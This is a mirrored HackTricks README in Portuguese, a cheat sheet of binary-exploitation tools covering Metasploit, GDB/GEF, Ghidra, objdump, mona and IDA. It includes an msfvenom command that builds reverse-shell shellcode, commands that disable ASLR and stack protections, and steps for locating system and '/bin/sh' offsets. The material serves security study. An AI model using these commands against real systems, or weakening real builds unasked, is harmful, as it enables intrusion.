Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 13:43:24 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/exploiting/tools
History
Translator workflow c928d8e52e Translated to Portuguese
2023-06-06 18:56:34 +00:00
..
pwntools.md Translated to Portuguese 2023-06-06 18:56:34 +00:00
README.md Translated to Portuguese 2023-06-06 18:56:34 +00:00

README.md

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Metasploit

pattern_create.rb -l 3000   #Length
pattern_offset.rb -l 3000 -q 5f97d534   #Search offset
nasm_shell.rb
nasm> jmp esp   #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01

Shellcodes

Um shellcode é um pequeno pedaço de código que é usado como carga útil em uma exploração de software. O objetivo de um shellcode é fornecer ao invasor acesso remoto ao sistema comprometido. O shellcode é geralmente escrito em linguagem assembly e é executado diretamente na memória do sistema. Ele pode ser injetado em um processo em execução ou pode ser usado para criar um arquivo malicioso que, quando executado, executa o shellcode.

msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c

GDB

Instalação

apt-get install gdb

Parâmetros

-q --> Não mostrar banner
-x <arquivo> --> Autoexecutar instruções GDB a partir daqui
-p <pid> --> Anexar ao processo

Instruções

> disassemble main --> Desmontar a função
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> Seguir processo criado
> p system --> Encontrar o endereço da função system
> help
> quit

> br func --> Adicionar breakpoint à função
> br *func+23
> br *0x12345678
> del NUM --> Deletar esse número de breakpoints
> watch EXPRESSÃO --> Parar se o valor mudar

> run --> Executar
> start --> Iniciar e parar em main
> n/next --> Executar próxima instrução (não entra)
> s/step --> Executar próxima instrução
> c/continue --> Continuar até o próximo breakpoint

> set $eip = 0x12345678 --> Mudar o valor de $eip
> info functions --> Informações sobre funções
> info functions func --> Informações sobre a função
> info registers --> Valor dos registradores
> bt --> Pilha
> bt full --> Pilha detalhada

> print variável
> print 0x87654321 - 0x12345678 --> Calcular
> examine o/x/u/t/i/s dir_mem/reg/ponteiro --> Mostra conteúdo em octal/hexadecimal/10/binário/instrução/ascii

  • x/o 0xDir_hex
  • x/2x $eip --> 2 palavras a partir de EIP
  • x/2x $eip -4 --> $eip - 4
  • x/8xb $eip --> 8 bytes (b-> byte, h-> 2 bytes, w-> 4 bytes, g-> 8 bytes)
  • i r eip --> Valor de $eip
  • x/w ponteiro --> Valor do ponteiro
  • x/s ponteiro --> String apontada pelo ponteiro
  • x/xw &ponteiro --> Endereço onde o ponteiro está localizado
  • x/i $eip —> Instruções do EIP

GEF

checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings

#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61

#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp

#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤  i f
Stack level 0, frame at 0x7fffffffddd0:
 rip = 0x400cd3; saved rip = 0x6261617762616176
 called by frame at 0x7fffffffddd8
 Arglist at 0x7fffffffdcf8, args: 
 Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
 Saved registers:
  rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤  pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely

Truques

Mesmos endereços no GDB

Durante a depuração, o GDB terá endereços ligeiramente diferentes dos usados pelo binário quando executado. Você pode fazer com que o GDB tenha os mesmos endereços fazendo o seguinte:

  • unset env LINES
  • unset env COLUMNS
  • set env _=<caminho> Coloque o caminho absoluto para o binário
  • Explorar o binário usando a mesma rota absoluta
  • PWD e OLDPWD devem ser os mesmos ao usar o GDB e ao explorar o binário

Rastrear para encontrar funções chamadas

Quando você tem um binário linkado estaticamente, todas as funções pertencerão ao binário (e não a bibliotecas externas). Nesse caso, será difícil identificar o fluxo que o binário segue para, por exemplo, solicitar entrada do usuário.
Você pode facilmente identificar esse fluxo executando o binário com gdb até que seja solicitada a entrada. Em seguida, pare com CTRL+C e use o comando bt (backtrace) para ver as funções chamadas:

gef➤  bt
#0  0x00000000004498ae in ?? ()
#1  0x0000000000400b90 in ?? ()
#2  0x0000000000400c1d in ?? ()
#3  0x00000000004011a9 in ?? ()
#4  0x0000000000400a5a in ?? ()

Servidor GDB

gdbserver --multi 0.0.0.0:23947 (no IDA, você deve preencher o caminho absoluto do executável na máquina Linux e na máquina Windows)

Ghidra

Encontrar o deslocamento da pilha

Ghidra é muito útil para encontrar o deslocamento para uma sobrecarga de buffer graças à informação sobre a posição das variáveis locais.
Por exemplo, no exemplo abaixo, uma sobrecarga de buffer em local_bc indica que você precisa de um deslocamento de 0xbc. Além disso, se local_10 for um cookie canário, isso indica que para sobrescrevê-lo a partir de local_bc, há um deslocamento de 0xac.
Lembre-se de que os primeiros 0x08 de onde o RIP é salvo pertencem ao RBP.

GCC

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Compilar sem proteções
-o --> Saída
-g --> Salvar código (GDB poderá vê-lo)
echo 0 > /proc/sys/kernel/randomize_va_space --> Para desativar o ASLR no Linux

Para compilar um shellcode:
nasm -f elf assembly.asm --> retorna um ".o"
ld assembly.o -o shellcodeout --> Executável

Objdump

-d --> Desmontar seções executáveis (ver opcodes de um shellcode compilado, encontrar ROP Gadgets, encontrar endereço de função...)
-Mintel --> Sintaxe Intel
-t --> Tabela de símbolos
-D --> Desmontar tudo (endereço da variável estática)
-s -j .dtors --> seção dtors
-s -j .got --> seção got
-D -s -j .plt --> seção plt descompilada
-TR --> Relocações
ojdump -t --dynamic-relo ./exec | grep puts --> Endereço de "puts" para modificar em GOT
objdump -D ./exec | grep "VAR_NAME" --> Endereço de uma variável estática (essas são armazenadas na seção DATA).

Despejos de núcleo

  1. Execute ulimit -c unlimited antes de iniciar meu programa
  2. Execute sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t
  3. sudo gdb --core=<path/core> --quiet

Mais

ldd executable | grep libc.so.6 --> Endereço (se ASLR, então isso muda toda vez)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Loop para ver se o endereço muda muito
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Deslocamento de "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Deslocamento de "/bin/sh"

strace executable --> Funções chamadas pelo executável
rabin2 -i ejecutable --> Endereço de todas as funções

Inmunity debugger

!mona modules    #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll   #Search for opcodes insie dll space (JMP ESP)

IDA

Depuração em Linux remoto

Dentro da pasta do IDA, você pode encontrar binários que podem ser usados para depurar um binário dentro de um Linux. Para fazer isso, mova o binário linux_server ou linux_server64 para dentro do servidor Linux e execute-o dentro da pasta que contém o binário:

./linux_server64 -Ppass

Em seguida, configure o depurador: Depurador (remoto linux) --> Opções de processo...:

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥